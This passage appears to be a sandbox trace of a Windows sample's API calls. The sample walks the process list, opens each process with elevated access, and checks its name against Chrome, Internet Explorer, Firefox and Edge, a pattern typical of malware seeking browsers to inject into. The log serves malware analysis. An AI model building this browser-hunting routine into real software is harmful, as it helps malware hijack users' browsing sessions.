	[0200.319] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0200.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1bb4
	[0200.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.320] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0200.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.321] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.321] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0200.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.321] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.321] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1bb8
	[0200.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.322] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.323] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.323] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.323] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.323] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0200.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1bbc
	[0200.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.324] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0200.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.324] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.325] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0200.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.325] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.325] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0200.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1bc0
	[0200.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.326] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0200.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.326] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.327] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0200.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.327] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.327] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0200.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1bc4
	[0200.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.328] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0200.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.328] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.329] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0200.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.329] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.329] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0200.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1bc8
	[0200.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.330] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0200.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.330] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.330] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0200.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.330] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.331] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1bcc
	[0200.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.331] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.332] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.332] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.332] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.333] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.333] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1bd0
	[0200.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.333] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.334] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.334] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.334] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.334] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.335] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1bd4
	[0200.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.335] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.336] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.336] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.337] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.337] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1bd8
	[0200.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.338] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.338] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.338] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.338] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.339] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1bdc
	[0200.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.339] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.340] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.340] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.340] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.341] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1be0
	[0200.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.341] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.342] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.342] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.342] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.343] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1be4
	[0200.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.343] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.344] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.344] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.344] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.344] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0200.345] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1be8
	[0200.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.345] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0200.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.346] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.346] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0200.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.346] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.346] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1bec
	[0200.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.347] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.347] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.348] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.348] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.348] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0200.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1bf0
	[0200.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.349] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.349] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.350] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.350] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0200.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1bf4
	[0200.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0200.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.352] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.352] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0200.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.352] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.352] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1bf8
	[0200.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.353] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.353] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.354] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.354] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.354] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0200.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1bfc
	[0200.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.355] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0200.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.355] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0200.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.356] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0200.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1c00
	[0200.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.357] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0200.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.357] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.358] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0200.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.358] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.358] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0200.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1c04
	[0200.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.359] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0200.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.359] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.359] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0200.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.360] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.360] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0200.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1c08
	[0200.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.361] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0200.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.361] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.361] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0200.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.362] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.362] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0200.362] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0200.362] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0200.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1c0c
	[0200.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.363] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0200.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.364] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.364] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0200.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.365] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.365] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0200.366] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1c10
	[0200.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.366] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0200.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.366] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.367] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0200.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.367] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.367] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0200.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1c14
	[0200.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.368] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
